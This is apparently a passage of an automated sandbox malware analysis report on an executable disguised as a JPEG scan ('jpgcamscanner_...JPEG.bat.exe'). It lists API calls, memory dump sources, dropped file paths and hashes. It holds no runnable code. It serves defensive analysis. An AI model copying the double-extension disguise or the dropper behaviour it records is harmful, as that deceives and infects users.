                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\$shovel\Undrinking.veg
                                  • API String ID: 3248276644-137636835
                                  • Opcode ID: 3317ae5885fe5557bfe6bd01748d3a5579ce53a26439151f89887cafc9669dc2
                                  • Instruction ID: b63be7d1610f08e16cf97c71acc26f165dc25b1935d551b17c13779f5e49e68e
                                  • Opcode Fuzzy Hash: 3317ae5885fe5557bfe6bd01748d3a5579ce53a26439151f89887cafc9669dc2
                                  • Instruction Fuzzy Hash: 24F0C826315D6156C622237A2C86AAF5644CE87324709473FF851B22D2DA3C89539E7E
                                  APIs
                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 00405908
                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 00405911
                                  • lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405922
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405902
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3355392842
                                  • Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
                                  • Instruction ID: bd87ec63c1f35a98f82bf41febae71866d1aa3f85b5b5a32f8f6ee96ed89cac6
                                  • Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
                                  • Instruction Fuzzy Hash: C6D0A9A26069316ED2022315AC09EEB2A0CCF16319B040022F600B62A2CA3C1D418BFE
                                  APIs
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Close$Enum
                                  • String ID:
                                  • API String ID: 464197530-0
                                  • Opcode ID: 7491e01b77a4f54db0745fefa8ef52e761586eb4c2d62f00184cdfe08c81871e
                                  • Instruction ID: 3f870e478545c218cbf8d1d8c83e1046b3ec80cd8b5b23ff6fd5b08b87a912e1
                                  • Opcode Fuzzy Hash: 7491e01b77a4f54db0745fefa8ef52e761586eb4c2d62f00184cdfe08c81871e
                                  • Instruction Fuzzy Hash: 76112B36504109FBEF129F91CE09F9E7B69AB48340F104072BE05B51E0E7B5AE11ABA9
                                  APIs
                                  • CharNextA.USER32(?,?,shovel\Undrinking.veg,?,00405A07,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
                                  • CharNextA.USER32(00000000), ref: 004059AE
                                  • CharNextA.USER32(00000000), ref: 004059C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharNext
                                  • String ID: shovel\Undrinking.veg
                                  • API String ID: 3213498283-2939288235
                                  • Opcode ID: 10bc9b63e27fd2895a2a79afc72dfc96a7ed1041d934c6f985c348dce719f526
                                  • Instruction ID: b251aa3e985fa887116ab65003500a8f213bfb7e3cc2aa31c3213714dbeb82a6
                                  • Opcode Fuzzy Hash: 10bc9b63e27fd2895a2a79afc72dfc96a7ed1041d934c6f985c348dce719f526
                                  • Instruction Fuzzy Hash: 22F0CDD1908F60AAFB3252684C45B675E88CB56371F1800ABE240A62C282B848408FAA
                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                  • GetTickCount.KERNEL32 ref: 00402D30
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
                                  • Instruction ID: f5aaf9fad63db9690dbd9b3812727a8d708a0014de572c02bbf4379bbf317f26
                                  • Opcode Fuzzy Hash: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
                                  • Instruction Fuzzy Hash: 42F05E70906220ABCA217F64FE4CACB7BA4FB45B527014576F145B11E4C3799C8ACBDD
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00405034
                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405085
                                    • Part of subcall function 00404055: SendMessageA.USER32(00010412,00000000,00000000,00000000), ref: 00404067
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
                                  • Instruction ID: 5be162d7cd7d71c2ccb341d7130f59d8c0266776e22eb2788f3d6f03133d665e
                                  • Opcode Fuzzy Hash: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
                                  • Instruction Fuzzy Hash: 2D019A7150060DABDF209F20DC80EAF3A25EB80354F204036FA14792D0C73A8891AEAA
                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406095,80000002), ref: 00405E97
                                  • RegCloseKey.ADVAPI32(?,?,00406095,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 00405EA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: Call
                                  • API String ID: 3356406503-1824292864
                                  • Opcode ID: 0288708f4d7737bac9a1074e9ca2e73b9ec30620d1184b938b48006dcff2752a
                                  • Instruction ID: d4591e39b0d39d961dff3dfa4a9982e28399459fd93e33a5317855cc39530622
                                  • Opcode Fuzzy Hash: 0288708f4d7737bac9a1074e9ca2e73b9ec30620d1184b938b48006dcff2752a
                                  • Instruction Fuzzy Hash: 92019A72510609ABDF228F20CC09FDB3FA9EF48360F008026FA45A2190D338DA11CBA4
                                  APIs
                                  • FreeLibrary.KERNEL32(?,75953410,00000000,C:\Users\user\AppData\Local\Temp\,004036DB,004034F5,?,?,00000006,00000008,0000000A), ref: 0040371D
                                  • GlobalFree.KERNEL32(006ECEB0), ref: 00403724
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403703
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3355392842
                                  • Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
                                  • Instruction ID: 9ffce7b129726733408ddd2483fbf3d013749e605b0eca4be9f0b214f3a53a2d
                                  • Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
                                  • Instruction Fuzzy Hash: 25E01273805121A7C7355F56ED04B5E7768AF49B22F05806BEC407B3A0C7746C418BD9
                                  APIs
                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 0040594F
                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 0040595D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrlen
                                  • String ID: C:\Users\user\Desktop
                                  • API String ID: 2709904686-3370423016
                                  • Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
                                  • Instruction ID: c4fcca613fcdd7c15110d01ecf8f186c4298fc2a4ba311cc039d9d6f64372384
                                  • Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
                                  • Instruction Fuzzy Hash: B7D0A7A3408D705EE3036310DC04B9F6A48CF12314F490062F080B61A5C67C1C424BAE
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6DDA115B
                                  • GlobalFree.KERNEL32(00000000), ref: 6DDA11B4
                                  • GlobalFree.KERNEL32(?), ref: 6DDA11C7
                                  • GlobalFree.KERNEL32(?), ref: 6DDA11F5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true
                                  • Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  • Opcode ID: 971c90d1f77368e26e4392e0ac5f89787636f47957644bd6d5450fd4bf02c759
                                  • Instruction ID: 2960e8d30618a066bc849e9cae150baaca48721f0d9222960d1a9b02c6910bde
                                  • Opcode Fuzzy Hash: 971c90d1f77368e26e4392e0ac5f89787636f47957644bd6d5450fd4bf02c759
                                  • Instruction Fuzzy Hash: 2F31B0B1448256EFEB11BFA8D969F297FF8FB0A250B1DC415F958C6211DB34D800CB28
                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A90
                                  • CharNextA.USER32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA1
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
                                  • Instruction ID: 037941339f6bd63fe355126afe518e0153d46939b0274778cc0aadc7e03f3bf8
                                  • Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
                                  • Instruction Fuzzy Hash: 29F0C231605414AFC702DBA5DC40D9FBBA8EF46350B2541A6E800F7251D234EE01AFA9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 092157d1806c33365514ef0058a1f22fe274aab5bd038c727a492454a7e3196f
                                  • Instruction ID: 0afcdc4741af8364103a881bebb31874b2c4a00b3c271124355a0ef39d4f143b
                                  • Opcode Fuzzy Hash: 092157d1806c33365514ef0058a1f22fe274aab5bd038c727a492454a7e3196f
                                  • Instruction Fuzzy Hash: D763F631D14B1ACADB11EF68C884699F7B1FF99300F51D79AE4587B121EB70AAC4CB81
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
